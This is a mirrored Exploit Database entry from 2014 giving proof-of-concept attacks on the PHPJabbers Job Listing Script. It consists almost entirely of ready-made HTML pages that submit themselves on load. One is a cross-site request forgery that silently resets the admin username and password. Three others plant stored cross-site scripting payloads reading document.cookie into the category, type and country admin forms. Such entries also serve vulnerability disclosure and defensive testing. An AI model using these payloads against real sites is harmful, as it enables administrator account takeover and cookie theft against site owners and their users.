PHPJabbers Job Listing Script – Multiple Vulnerabilities

• Exploit Database
• 106 阅读

• 作者： HackXBack
  日期： 2014-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30910/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  Job Listing Script - Multiple Vulnerabilties ====================================================================   #################################################################### .:. Author : HackXBack .:. Contact: h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/preview/job-listing-script/ ####################################################################   ===[ Exploit ]===   [1] Cross Site Request Forgery ==============================   [Change Username/Password Admin]   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminOptions&action=update"> <input type="hidden" name="options_update" value="1"/> <input type="hidden" name="username" value="admin"/> <input type="hidden" name="password" value="password"/> <input type="hidden" name="value-enum-9" value="Yes|No::Yes"/> <input type="hidden" name="value-enum-8" value="Yes|No::Yes"/> <input type="hidden" name="value-enum-7" value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j|d-m-Y|m-d-Y|Y-m-d|j-n-Y|n-j-Y|Y-n-j::d.m.Y"/> <input type="hidden" name="value-enum-6" value="Yes|No::Yes"/> <input type="hidden" name="value-int-5" value="5"/> <input type="hidden" name="value-string-4" value="http://www.example.com"/> <input type="hidden" name="value-enum-3" value="Yes|No::Yes"/> <input type="hidden" name="value-string-2" value="email@domain.com"/> <input type="hidden" name="value-int-1" value="10"/> </form>   </body> </html>   [2] Multiple Cross Site Scripting ==================================   # CSRF with XSS Exploit:   I. Xss In Categories   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminCategories&action=create"> <input type="hidden" name="category_create" value="Iphobos Blog"/> <input type="hidden" name="category_title" value="<script>alert(document.cookie);</script>"/> </form> </body> </html>   II. Xss In Type   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminTypes&action=create"> <input type="hidden" name="type_create" value="Iphobos Blog"/> <input type="hidden" name="type_title" value="<script>alert(document.cookie);</script>"/> </form> </body> </html>   III. Xss In Country   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminCountries&action=create"> <input type="hidden" name="country_create" value="Iphobos Blog"/> <input type="hidden" name="country_title" value="<script>alert(document.cookie);</script>"/> </form> </body> </html> ####################################################################